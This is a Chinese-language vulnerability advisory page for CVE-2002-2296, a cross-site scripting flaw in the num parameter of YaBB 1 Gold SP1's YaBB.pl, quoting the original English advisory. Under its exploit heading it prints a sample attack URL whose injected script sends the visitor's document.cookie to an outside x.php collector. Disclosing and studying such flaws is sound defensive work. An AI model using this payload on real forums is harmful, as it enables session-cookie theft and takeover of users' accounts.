YaBB YaBB.pl跨站脚本漏洞

YaBB YaBB.pl跨站脚本漏洞

漏洞ID 1107116 漏洞类型 跨站脚本
发布时间 2002-11-28 更新时间 2002-12-31
图片[1]-YaBB YaBB.pl跨站脚本漏洞-安全小百科CVE编号 CVE-2002-2296
图片[2]-YaBB YaBB.pl跨站脚本漏洞-安全小百科CNNVD-ID CNNVD-200212-162
漏洞平台 CGI CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/22052
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-162
|漏洞详情
YetAnotherBulletinBoard(YaBB)1GoldSP1版本的YaBB.pl存在跨站脚本漏洞。远程攻击者借助num参数插入任意web脚本或者HTML。
|漏洞EXP
source: http://www.securityfocus.com/bid/6272/info

A cross-site scripting vulnerability has been reported in the YaBB forum. This vulnerability is due to insufficient sanitization of URI parameters in some scripts.

As a result, it is possible for a remote attacker to create a malicious link to the login page of a site hosting the web forum. When this link is visited by an unsuspecting web user, the attacker-supplied code will be executed in their browser in the security context of the vulnerable website.

It has been demonstrated that this vulnerability may be exploited to steal cookie-based authentication credentials.

http://www.area51experience.com.ar/foro/YaBB.pl?board=gral;action=display;
num=10360245269<Script>location%3d'Http://url/x.php?Cookie%3d'
%2b(document.cookie)%3b</Script>
|参考资料

来源:XF
名称:yabb-xphp-xss(10737)
链接:http://xforce.iss.net/xforce/xfdb/10737
来源:BID
名称:6272
链接:http://www.securityfocus.com/bid/6272
来源:BUGTRAQ
名称:20021201Cross-siteScriptingVulnerabilityinYaBB1Gold-SP1!
链接:http://archives.neohapsis.com/archives/bugtraq/2002-12/0003.html

相关推荐: l2tpd漏洞

l2tpd漏洞 漏洞ID 1203882 漏洞类型 缓冲区溢出 发布时间 2002-09-05 更新时间 2002-09-05 CVE编号 CVE-2002-0873 CNNVD-ID CNNVD-200209-024 漏洞平台 N/A CVSS评分 5.0 …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享